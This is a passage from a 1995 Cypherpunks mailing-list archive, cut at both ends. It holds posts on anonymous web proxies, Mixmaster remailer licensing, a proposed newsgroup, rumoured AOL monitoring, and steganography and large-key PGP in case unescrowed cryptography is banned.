DX1M/+hPddE6dT8ZgWdSt9dUvMQ7hu8BfHKCkcf0XWKmmeJ8jh+XDISvC7EFgIGT H5XjkLpA2Eg+qmYzKHDOQaQT9SfzSVs4Y9sTzMlbewBi3jna6Dz/Sw== =G2pZ -----END PGP SIGNATURE----- -- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From dl at hplyot.obspm.fr Sun Sep 17 03:11:09 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sun, 17 Sep 95 03:11:09 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr> Message-ID: <9509171010.AA11011@hplyot.obspm.fr> Aleph One writes: > Whats the problem of using CERN in proxy mode? You can even set it up do > to chaining. The chaining is not dynamic (but its is maybe patcheable) ? I don't think there is support for encryption (ssl patches maybe?) ? Also, CERN httpd is a huge thing, maybe some smaller proxy would do... My development is/could be based on my httpd, but simplified... I'll have a look at standalone already existing proxies before reinventing the wheel... Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From dl at hplyot.obspm.fr Sun Sep 17 03:17:15 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sun, 17 Sep 95 03:17:15 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr> Message-ID: <9509171016.AA11022@hplyot.obspm.fr> Christian Wettergren writes: > | + Chaining would be a imo good idea (ie cli <-> anonproxy1 <-> > | anonproxy2 <-> ... <-> server) but how would you manage to tell > | your favorite web browser to add in its header something like > | Http-Proxy-List: anonproxy2, ... > | An alternative would be to have a database of avaibale (running) > | proxies and that the proxy itself randomly choose a next route ? > Doesn't most of the browsers support a "firewall-proxy-mode", where > all queries are sent of to a special daemon, that forwards the query > on. This would probably be the place to add the header-munging. yes, they support one level of proxying, but not several as far as I know (so chaining must be done by the proxy itself as I suggested below) > How do you plan to get the reverse-path working? Having a > encrypted/chained return path in the request? Reverse path is not a problem because WWW works with a bidirectional connection, so you get the answer to you query on the same path as you send it (its client <-> proxy1 ... (<-> and not ->)) Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From aba at dcs.exeter.ac.uk Sun Sep 17 05:37:01 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sun, 17 Sep 95 05:37:01 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org> Message-ID: <18742.9509171235@exe.dcs.exeter.ac.uk> Roy Silvernail writes: > In list.cypherpunks, aba at dcs.exeter.ac.uk writes: > > One thing I have been thinking would be nice would be a USENET > > newsgroup, as mailing lists are a step away from easy access which > > some people never make. > > That's a feature, not a bug. Unless the group was moderated, I predict > the S/N ratio to be <= 0. Witness the crap in alt.2600. I think you misunderstand what I was saying, I wasn't saying *instead of*, but *as well as*, and with a different purpose, just a comment on Peter's post as to creating *another* group / list with a different purpose, one to specifically further his ideas on transferring technology to more people. > The mailing list, as someone said before me, works as a limited > pre-screening system. Given the nature of the list's focus and > discussion, I think a newsgroup would end up being a stable > attractor for the clue-deficit crowd. Not something I'd find > useful. So I most definately agree with the likely effects of for instance merging the list and a newsgroup with a mail to news gateway, as someone suggested, this would be a really bad idea, and would open the list to a flood of junk. If a group such as say alt.cypherpunks were created, it would be just yet another group which hosts endless directionless arguments with David Sternlight, etc. via huge cross posting. Perhaps it would be better to just post crypto FAQs to existing crypto groups, to further use of crypto. A later suggestion someone else had was of a read-only mailing list mirror in a newsgroup. I'm not sure about this, I mean yes it would allow more people to casually read, and this is what I use Todd Masco's nntp.hks.net nntp server for, and find it a really nice way to read, much nicer than a mail box, even if it was slower for me. Of course there are software solutions which allow you to set up similar effects your self, but as a standard read-only newsgroup, I think it would likely increase readership. But I'm not sure, I mean even that is likely to get the list some more junk, as it will less of a barrier to post, I mean all you have to do is send to cypherpunks at toad.com, after all, and it wouldn't take a lot to figure that out. Undecided as to whether a read only newsgroup in mail.cypherpunks or something would be a good idea or not. I'm sure it already happens a lot of places, so perhaps it won't make a lot of difference. But I definately wasn't advocating gating an alt group to cpunks and vice-versa. Adam From banisar at epic.org Sun Sep 17 07:21:57 1995 From: banisar at epic.org (Dave Banisar) Date: Sun, 17 Sep 95 07:21:57 PDT Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses Message-ID: > >The Cypherpunks group is not like that. Lacking any formalized leadership, >and--most importantly--lacking offices in D.C., we can't be asked to >perform like the usual trained seals who produce the soundbites that fit >into the stories too many reporters want. Again, a weakness and a strength. Hey! Bark Bark Bark Bark Dave (partially trained seal protesting that description) PS Sorry all for my last message that should have only gone to Bruce. I'm claiming jetlag. David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org Washington, DC 20003 * HTTP://epic.digicash.com/epic From sunder at amanda.dorsai.org Sun Sep 17 08:16:36 1995 From: sunder at amanda.dorsai.org (Ray Arachelian) Date: Sun, 17 Sep 95 08:16:36 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <9509170429.AA05221@zorch.w3.org> Message-ID: On Sun, 17 Sep 1995 hallam at w3.org wrote: > I like having privacy, part of the cost of that privacy is respecting the > privacy of others. And that's where we, the cypherpunks come in, by advocating strong cryptographic protocols and tools, we can keep every machine safe from intrusion; it's not just Uncle Sam's evil minions that should have total privacy; normal citizens need privacy too - the spooks shouldn't be the only ones with it. :-) This message has been brought to you by the Cypherpunks. Use only Cypherpunks brand software ;-D ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From sunder at amanda.dorsai.org Sun Sep 17 08:45:57 1995 From: sunder at amanda.dorsai.org (Ray Arachelian) Date: Sun, 17 Sep 95 08:45:57 PDT Subject: AOL monitoring In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com> Message-ID: This sounds fishy to me. Why would AOL need to download the databases of files you've downloaded to your hard drive? I'm 99.9999% sure that they would keep their own logs about just what you do online. They wouldn't have to steal a copy of the log from your hard drive to find this out... A further hint as to why this won't work: the client software doesn't keep track of which messages you've read in a discussion area, AOL's server's do. How do I know this? Because I use AOL on a Mac from home, and from Windows at work. Completely separate installations, yet AOL remembers which messages are New or rather unread to me regardless of which of the clients I use. So if they keep that info on their side, they sure as hell wouldn't keep the logs of the files you've downloaded on yours. Making the download database read only is a silly measure, not likely to do anything for you. If you want to protect what is on your system, it's easy. Encrypt your whole hard drive except for about 20Mb or so, and don't mount the encrypted portion when going on AOL. Leave a copy of Windows with nothing but AOL in it outside, and use that copy. If their software tries to access another drive, they don't get a clue as to what you have or don't -- other than DOS and Windows and their client. :-) There are probably a dozen more ways of doing this.... i.e. booting of a SyQuest or M.O. cartdrige, using another computer to download files, using another PC which has nothing on it, using these in combination with using another account - not just another screen name, etc. Bad thing is that this will mean a lot of extra work on your part... But from the sounds of this, the precautions offered here are just another net.legend in the making... If I were AOL, I would have written their side of the software to track the files, not the client side. Further, if I wanted to (I'm not AOL, nor do I want to do the following, nor do I have any knowledge of how AOL's clients were written...) if I wanted to check out your hard drive, I would include directory searching routines in the client, as well as a way to transfer info back on any file or the file itself to AOL. However this would be obvious to any smart user as they would see their external modem's XMIT LED light up like christmas in a very suspicious way. There is no way to know if such code exists in the AOL client, however, if there is, as unlikely as the possibily is, you still can hide your files from such possible privacy invasion techniques. ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From aleph1 at dfw.net Sun Sep 17 09:27:08 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 17 Sep 95 09:27:08 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr> Message-ID: Points taken. But I belive the are (or will be patches) for CERN to d SSL. Check the SSLeay ssl-user mailing list. While we talking abut anonymous proxies. I always wanted to set up an IP anonymous proxie using Linux IP tunnel and maybe also IP Masquareding. This would allow people to have anonymous Web Servers, etc. (But as anything it would probably be abused for hacking, etc at no end). Any commments? Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Sun, 17 Sep 1995, Laurent Demailly wrote: > The chaining is not dynamic (but its is maybe patcheable) ? > I don't think there is support for encryption (ssl patches maybe?) ? > Also, CERN httpd is a huge thing, maybe some smaller proxy would > do... > My development is/could be based on my httpd, but simplified... I'll > have a look at standalone already existing proxies before reinventing > the wheel... From tcmay at got.net Sun Sep 17 09:46:11 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 17 Sep 95 09:46:11 PDT Subject: Trained Seals and Beltway Insiders Message-ID: At 2:23 PM 9/17/95, Dave Banisar wrote: >> >>The Cypherpunks group is not like that. Lacking any formalized leadership, >>and--most importantly--lacking offices in D.C., we can't be asked to >>perform like the usual trained seals who produce the soundbites that fit >>into the stories too many reporters want. Again, a weakness and a strength. > >Hey! Bark Bark Bark Bark > >Dave (partially trained seal protesting that description) Well, sorry for letting my rhetorical excesses come to the fore! On even days I think the work of the Washington lobbying/policy groups is very useful, even if not always done the way I would do it. (Having grown up just outside D.C., nothing would ever get me to live in that area again, though.) On odd days, I think of them as "Beltway insiders," with the same handful of "spokeswonks" handling all of the issues, dealing with all of the press conferences, attending the various D.C. events, and essentially being part of the System. I never did memorize what all those "estates" are, as in the Third and Fourth Estates. But I think the Washington crowd has several components: The Gubment (itself divided into several branches), the Press, the Contractors, and the Lobbyists. The "think tanks" which ring D.C. and other areas (Brookings, Cato, the new Progress and Freedom Foundation, the military advisory think tanks, and a dozen or more others) are an industry unto themselves. Add to these the various lobbying groups (NRA, AMA, tobacco, Right to Life, etc.). And throw in various national groups with D.C. offices. Quite a stew. They all play off each other, with the lobbying groups trained to "give good sound" to the reporters who want some quotable line about child porn, or Clipper, or whatever. Any conclusions for us? Maybe, but I won't touch them here. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Sun Sep 17 09:58:34 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 09:58:34 PDT Subject: Commercial Mixmaster In-Reply-To: <199509170348.XAA06314@bwh.harvard.edu> Message-ID: <199509171656.MAA27949@frankenstein.piermont.com> Adam Shostack writes: > Its worth noting that the source code to Julf's Penet remailer > is not public (AFAIK). People use it becuase they trust Julf, or > trust people who trust Julf. Yeah, but remember -- there is very little that Julf's code could do to "cheat". Julf's system maintains a mapping of users to aliases anyway, so he has no need to "pervert" the system -- he can do all the bad things we worry about with it working correctly. We therefore need not see the code to trust the system, because the only way that the system is trustworthy is if Julf is trustworthy. Other systems based on cryptography might not be in this position. Perry From Andrew.V.Kovalev at jet.msk.su Sun Sep 17 10:06:38 1995 From: Andrew.V.Kovalev at jet.msk.su (Andrew V. Kovalev) Date: Sun, 17 Sep 95 10:06:38 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Laurent Demailly wrote: > > Aleph One writes: > > Whats the problem of using CERN in proxy mode? You can even set it up do > > to chaining. > The chaining is not dynamic (but its is maybe patcheable) ? > I don't think there is support for encryption (ssl patches maybe?) ? > Also, CERN httpd is a huge thing, maybe some smaller proxy would > do... > My development is/could be based on my httpd, but simplified... I'll > have a look at standalone already existing proxies before reinventing > the wheel... > I am almost sure that new TIS http-gw will do. Especially if ssl will be added by some kind soul.. avk - -- - --- \/\/\/ Andrew.V.Kovalev at jet.msk.su +7-095-973-4848 office Security is like defecation - unpleasant, but alternatives are worse. -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQBFAwUBMFxVZvLk60Co0vEHAQHYTQF+OWKil3l+o1gGQNw4jpWseQL80Fi9YwRc ydyRvfkmnFn+5hhpQXLVSlS+WwyWNt1G =TYGa -----END PGP SIGNATURE----- From dcl at panix.com Sun Sep 17 10:16:06 1995 From: dcl at panix.com (David C. Lambert) Date: Sun, 17 Sep 95 10:16:06 PDT Subject: CYPHERPUNK considered harmful Message-ID: <199509171657.MAA26446@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn wrote: > On Fri, 15 Sep 1995, David C. Lambert wrote: > > > BTW, I'm not for changing the name of the list, but I do see the logic > > in a more establishment-friendly name to use when lobbying the public. > > Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which > hide their true (Ohhh! Scary!) potential in an effort to make them commonly > acceptable to joe sixpack. I believe you misstate the point that people are trying to make. I haven't seen anyone advocating the "watering down" of any so-called "teachings" to "hide" any "true potential". The only thing that people have mentioned is that some of the less clueful out there have a knee jerk response to the name "cypherpunk". That's all. > Can't we all see what road this leads down? No. Please enlighten us. > At the risk of politicizing the issue, I wouldn't be the first to call this > "left-speak" or "term-sanitizing." And this matters because...? > Really the core issue is that the citizens of their respective nations > need to either: > > 1> See cryptography for the important individual rights issue that it > is and latch on to the basic desire for free and unmonitored commerce and > exchange without censorship or observation. > > or > > 2> Decide that they are not interested in the issues because these > issues are too radical, or simply because their own political ideas > fall left (or statist) of this spectrum. What exactly is it that you feel "the citizens of their respective nations" are doing right now, if not this? > in the end I > don't care if every joe sixpack on the planet uses real crypto, just so > long as those I am to conduct commerce (of data or goods) with do. If this is the case, then I'm at a loss to understand how you fail to see the merit in a "term-sanitizing", as you put it, in order to make the use of strong crypto desired and required by Joe Sixpack. How do you expect the legality of string crypto to survive unless Joe and his friends exert political pressure to keep it alive? Isn't it obvious that unless this happens, that strong (unescrowed) crypto is on the path to being outlawed (at least in the US, and several other countries)? > The final judgement will be in the advantage of velocity and security of > transactions and the wealth that this "allocates" to those wise enough to > adopt crypto exchange systems. Evolution in action. If this makes me > elitist, so be it. Elitist or not, this is beside the point. People are bringing up political and rhetorical concerns because they feel that political and persuasive methods are required *right now* in order to preserve the *legality* of strong crypto. I only care about whether Joe Sixpack wants strong crypto because if I can't persuade him that he does, he won't help me keep it legal in my country of residence. Once it's legality seems safe(r) from attack, he can go on using rot13 for all I care. David C. Lambert dcl at panix.com (finger for PGP public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFxSiapplsfgM88VAQGj5wQAoY2FQe0rh0InWF1xOmST91QDCy4TrYUj Y6Vnu/i3yspS/vDsKLMbIYAezAJEtgOPHEOf7Rv1Y4gKDyZNAJbYESXiYTQXD7O3 SNWNtb9nAT6l1RPqsnFR9yWAWYQ1CS3dLRpNpMBIqzL/HnKyKrgitLKQ530XtF8O 78u6jtmsBa4= =Jgoe -----END PGP SIGNATURE----- From jlasser at rwd.goucher.edu Sun Sep 17 10:33:38 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Sun, 17 Sep 95 10:33:38 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Sat, 16 Sep 1995, Steven Levy wrote: > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > > It may not be a crime, but it's not nice to steal a title. > Well, it IS kinda a common word these days. The Beatles and Madonna both have a song called "Rain" -- this doesn't mean madonna stole it, does it? Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From tcmay at got.net Sun Sep 17 12:25:41 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 17 Sep 95 12:25:41 PDT Subject: Mixmaster Licensing Offer Explained Message-ID: (I've trimmed the mailing lists I'm not on...) At 8:01 AM 9/17/95, Lance Cottrell wrote: > Permission is granted to distribute this document in any media for any >purpose as long as the entire document is distributed with the attached >digital signature intact, or the document is clearly marked as having been >modified with the locations of deleted text indicated. So sue me. :-} (That is, I'll treat this article in the normal way, trimming sections I'm not responding to and making note of elisions only where I think it important to.) ... >The company offering to license Mixmaster is Phoenix DataNet, a Houston >area ISP. John Perry, a person well known to this list and the remailer >community in general, is a Senior Systems Administrator at Phoenix. > >On Thursday I received a call from John. Some others at Phoenix had just >noticed a Mixmaster remailer he had been running on one of their machines. >Phoenix has several large corporate customers who need secure transactions >for some special applications. The core engine of Mixmaster is well suited >to that purpose. They offered to license the code from me to use as the >framework on which to build these other programs. In the process they will >rewrite many basic functions in Mixmaster that need major overhaul (e.g., >key management). We will incorporate those improvements back into >Mixmaster. This should lead to porting Mixmaster to several other >platforms, and to fixing most of my worst coding atrocities. First, I think it generally a Good Thing that remailer software gets commercialized and cleaned-up, or that at least commercial packages exist. (I'm not going to get into commercial vs. non-commercial and Microsoft vs. Gnu issues.) If Lance makes a bunch of money off this, more power to him. However, this commercialization raises some interesting issues. Others have dealt with various concerns about the code integrity, about features added, and even about TLA access. I'll address some liability and legal issues. * Will Phoenix DataNet be making the mix software available for purchase, or are they funding _internal development_? (That is, mixes for their corporate clients, which raises some interesting issues in and of itself, as discussed below.) * If Phoenix is planning to resell Mixmaster, or whatever they call it (as "Mixmaster" may remain a trademark of the appliance company which originated the name), what will be their liability for the various abuses which are likely to occur? None of the existing remailers/mixes has had "corporate" backing, and the "deep pockets" corporations are often presumed to have, so lawsuits have not gone after corporations. * On the other hand, if Phoenix is primarily aiming at internal use, for specified corporate customers, how will they stop others from using the service? If chaining is used, and absent any special "untraceable postage tokens" they might issue (as one way to control access), how will the Nth mix in a chain of M mixes "know" whether an incoming message can be remailed or not? (Schemes to sign the packets obviously flunk the anonymity test.) There are many other interesting issues which crop up when Giant Corporation begins to deploy and use remailers. What if, for example, the Justice Department claims that Phoenix and its customers are using remailers for price fixing and collusion? (Just to be clear on this, I personally have no problems with such collusion....but the Antitrust people see things differently.) (To be sure, telephones can and of course have been used to collude. Partly, wiretaps help here (until voice encryption happens...). But Justice has gone after airline reservation computer systems which they believe were used to "signal" price information. Imagine how overjoyed they'll be to see Phoenix DataNet deploy their system!) Again, don't confuse my arguing points here with any kind of advocacy of the Justice Department/Antitrust Division position. I'm only trying to think out what some of the legal issues will be that face the first U.S.-domiciled company to actually start selling remailers or to set up a remailer network for customers. Interesting times ahead. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From aba at dcs.exeter.ac.uk Sun Sep 17 12:28:43 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sun, 17 Sep 95 12:28:43 PDT Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.) Message-ID: <20045.9509171928@exe.dcs.exeter.ac.uk> Black Unicorn writes: > > 3. Unescrowed crypto banned, with advanced stego, panic passwords, > stealth PGP, incorporated remailers all across international borders > making offenders impossible to identify or catch. > > [...] I believe the goal is to propogate crypto far enough to at > least have a salient "underground" participants. > > Some months ago I called for advanced stego and stealth PGP as well > as larger keys in the event we all had to go "into the crypto > closet" for a time. > > I call for them again. Guess you're saying that a future underground cypherpunk group is going to need tools to continue if the US plummets into cryptographic darkness. And you'd like to see these tools available now, as it will be difficult to distribute, and set up if the big ban is already on us. A pre-emptive safety precaution in the event that it happens. So what threat model do you envisage tools being needed to withstand? A couple of the things you list are realisable with little effort, one is a PGP with large keys, I am using a doctored to go to 16k keys (I did this to amuse myself with getting timings for how long encrypt / decrypt & keygen take for varying key sizes). The patch is small, and easy to figure out, just a couple of #ifdefs, various people posted their patches to do this to alt.security.pgp some time ago. I think there was at least one patched version of PGP distributed (unofficially of course - PGPs largest allowed key size being 2048 bits), though I don't have any URLs for such a beast. Part of the problem is people seem to frown on distributing PGPs with larger keys, or alternate versions of PGP, due to version control issues, and such. Technically easy to do tho. Adding stealth features to PGP, or even as standalone, aren't hard either. I've been trying to add Hal's improved stealth algorithm to Henry Hastur's stealth program. It's basically finished, except for the problem that I am unsure about the security of the construct: x' = f(MD5(x)) * N + x where 0 < x < N and 0 < x' < M where M is a power of 2, and M > 2^64 * N and f is just a scaling function If that is secure I'd be happy to release an updated version of stealth, but without assurance, it is necessary to include random numbers, and the best way I see to achieve that is to build it in to PGP, and use PGP's ran no utils directly. If you're talking about a different version of PGP, perhaps this wouldn't be a big deal anyway. So that's big key PGP, and stealth PGP. I'm presuming most people figure 128 bit IDEA is suitably unassailable, but RSA keys are a moving target, and less predictable due to improvements in factoring algorithms. Already people are talking about an academic RSA129 like attempt on a 512 bit PGP key. What are views about creating Yet Another version of PGP. I've read a few discussions of this kind of thing in the past on alt.security.pgp, and most people were against it. But I think some useful things could come out of it. The other problem is working with pgp2.x when there is a version 3.0 being worked on, not sure what stage 3.0 is at, any coding.. perhaps if a stealth capable pgp2.x was worked on, and a few features demonstrated, the 3.0 folks would be willing to take a look at it to evaluate the features for possible version 3.0 inclusion. Just don't want to go do a of work, and then get a polite cease and desist from those with interests in managing the version control of PGP. Good stego tools are the other main problem. My understanding is that all of the stego programs to date do it by just ripping out the LSB of an audio or graphic image, and replacing that with the bits from a message with a stealthed message. Sending masses of pictures around is kind of suspicious tho, I mean several a day, each freshly scanned from what? I guess if video conferencing gets here, it would be fun to add the stego into that noisy stream, same for internet phone. Text stego, with bits hidden in the entropy of english text seems a harder objective, but a useful one. I'm presuming that plausible deniability, and facilities for anonimity are essentials. How does one go about doing that? Using newsgroups to carry on a two level communication might be a good way of maintaining plausible deniability. Either a stego interface to remailers in other countries, so that the stego gateway to remailers scans it's newspool, decrypts messages addressed to it, and forwards that off to the anon remailers. The outcome could be a further text or graphics stegoed message for posting to a suitably high noise news group. The recipient is also scanning his news spool for stego messages addressed to him. Sounds feasible. Perhaps a proof of concept would be easy to knock up, if a place holder is inserted for the 'good text stego' program should go. There was a 'texto' posted a while ago which did something suitable. Adam From blancw at accessone.com Sun Sep 17 12:44:03 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sun, 17 Sep 95 12:44:03 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509171945.AA26239@accessone.com> From: Ray Arachelian And that's where we, the cypherpunks come in, by advocating strong cryptographic protocols and tools, we can keep every machine safe from intrusion; it's not just Uncle Sam's evil minions that should have total privacy; normal citizens need privacy too - the spooks shouldn't be the only ones with it. :-) This message has been brought to you by the Cypherpunks. Use only Cypherpunks brand software ;-D ................................................ Cypherpunk crypto in every computer in every home. .. Blanc From gnu at toad.com Sun Sep 17 13:20:14 1995 From: gnu at toad.com (John Gilmore) Date: Sun, 17 Sep 95 13:20:14 PDT Subject: Intellectual Property and Crypto collision Message-ID: <9509172020.AA23349@toad.com> > ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW > A presidential task force has recommended that electronic transmission of > books, magazine articles and software should be classified as copies > subject to existing copyright laws. The task force also recommended that > it should be illegal to make or distribute products aimed at decoding > encrypted software without the consent of the copyright owner. Would this make it illegal to produce tools for decrypting key-escrowed software? :-) John From shields at tembel.org Sun Sep 17 13:28:04 1995 From: shields at tembel.org (Michael Shields) Date: Sun, 17 Sep 95 13:28:04 PDT Subject: cypherpunks as a newsgroup Message-ID: A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From hallam at w3.org Sun Sep 17 13:39:22 1995 From: hallam at w3.org (hallam at w3.org) Date: Sun, 17 Sep 95 13:39:22 PDT Subject: Commercial Mixmaster In-Reply-To: <199509170513.AA06296@ideath.goldenbear.com> Message-ID: <9509172034.AA07230@zorch.w3.org> Adam Shostack writes: > Its worth noting that the source code to Julf's Penet remailer > is not public (AFAIK). People use it becuase they trust Julf, or > trust people who trust Julf. I seem to remember that Julf took over Stephie's code from Wizvax which used to post into the alt.sex.bondage group. I suspect he has modified it since but I don't think that there is much to it. Even if Julf released some code there would be no way ofknowing that it was the code he runs except by compromising the anonymity of the service itself. In any case it is clear that the confidentiality of the service relies entirely on the trustworthyness of Julf and the security of the lines into Julfs server. I accept the former but can't believe for a moment that every spook and his aunt doesn't have a tap on the latter. How does the cypherpunks remailer work? Does PGP encrypt the signature of a message so that the identity of the sender is unknown? Or is it simply PEM style encryption so that the DN of the sender is in the clear :-( I Phill From bdavis at thepoint.net Sun Sep 17 13:53:27 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 17 Sep 95 13:53:27 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <199509170217.WAA10568@clark.net> Message-ID: On Sat, 16 Sep 1995, Ray Cromwell wrote: > > > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > > >is curiosity." > > > > It may not be a crime, but it's not nice to steal a title. > > I think there's a high probability of someone independently inventing > the title "hackers" for this movie rather than steal it. It's not > very original. Besides, the content of your book has very little > to do with this movie. The movie would be more appropriately > titled "crackers" or "phreakers" > > -Ray > > > Or maybe Bruce Sterling should object. From stewarts at ix.netcom.com Sun Sep 17 14:22:45 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 17 Sep 95 14:22:45 PDT Subject: CYPHERPUNK considered harmful Message-ID: <199509172122.OAA00733@ix3.ix.netcom.com> >I haven't seen anyone advocating the "watering down" of any so-called >"teachings" to "hide" any "true potential". The only thing that people >have mentioned is that some of the less clueful out there have a knee >jerk response to the name "cypherpunk". That's all. At least early on, back when we were getting our 15 kilobytes of fame on the front covers of WiReD and the NYT magazine section, the name appeared to be useful for getting attention; Tim and Eric were getting occasional quotes in the mundane press, as was John Gilmore who has had longer-term relationships with some of the press through his other activities. Maybe the NYT isn't the paragon of respectability that it once was..... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From tcmay at got.net Sun Sep 17 14:40:32 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 17 Sep 95 14:40:32 PDT Subject: "Attachments" Message-ID: Why do people keep sending "attachments"? This was just a text article, and not an application (program), so why was it included as an "attachment"? At 8:27 PM 9/17/95, Michael Shields wrote: >Attachment converted: Macintosh HD:cypherpunks as a newsgroup (????/----) >(00005C4E) The message was, as Microsoft Word 6.0 saw it: -----BEGIN PGP SIGNED MESSAGE----- The general opinion seems to be that the netnews format is very convenient, though we should keep the list; but that entering Usenet or Altnet would lower the S/N. Why not, then, start a new hierarchy? Why not gate cypherpunks not to alt.cypherpunks or comp.security.cypherpunks, but to crypto.cypherpunks? We could feed it freely between us and set up NNTP servers which are open for just crypto.*. c.c would be the only crypto.* group for now, but it would also be easy to add more -- say, for the "respectable" splinter group, or for protocol WGs. We'd get the convenience of netnews without the high profile. I'm willing to run the gateway on news.tembel.org and feed other sites, if people think crypto.cypherpunks is a good idea. Opinions? - -- Shields. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFyEm+yjYMb1RsVfAQF1YQQAneg8c6yUKJUUybqepl52yqyS53OGrpLq YfdrMYaIxMWdWKNpMAAus/g8WjWMwYrrB4p+8/WLMm4HsUEHO2ouNzbraiyMRwaB NEhf0v/91h9jGniZIX5uQyqSdM/VC5YupWV0cITqKte9iLZR77C5hVqXBiLhRcwG YL8GwDP5tYw= =roIF -----END PGP SIGNATURE----- ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Sun Sep 17 15:01:34 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 17 Sep 95 15:01:34 PDT Subject: Commercial Mixmaster Message-ID: At 8:34 PM 9/17/95, hallam at w3.org wrote: >I seem to remember that Julf took over Stephie's code from Wizvax which >used to >post into the alt.sex.bondage group. I suspect he has modified it since but I >don't think that there is much to it. Actually, it was the code of Karl Kleinpaste that Julf took over...I seem to recall Julf saying this in an article. In any case, this is what Karl claimed last year: "There are 3 sites out there which have my software: anon.penet.fi, tygra, and uiuc.edu. I have philosophical disagreement with the "universal reach" policy of anon.penet.fi (whose code is now a long-detached strain from the original software I gave Julf -- indeed, by now it may be a complete rewrite, I simply don't know); ....Very bluntly, having tried to run anon servers twice, and having had both go down due to actual legal difficulties, I don't trust people with them any more." [Karl_Kleinpaste at cs.cmu.edu, alt.privacy.anon-server, 1994-08-29] >How does the cypherpunks remailer work? Does PGP encrypt the signature of a >message so that the identity of the sender is unknown? Or is it simply PEM >style >encryption so that the DN of the sender is in the clear :-( Assuming this is a serious question and not a troll, cypherpunks remailers (at least the ones I have used) completely 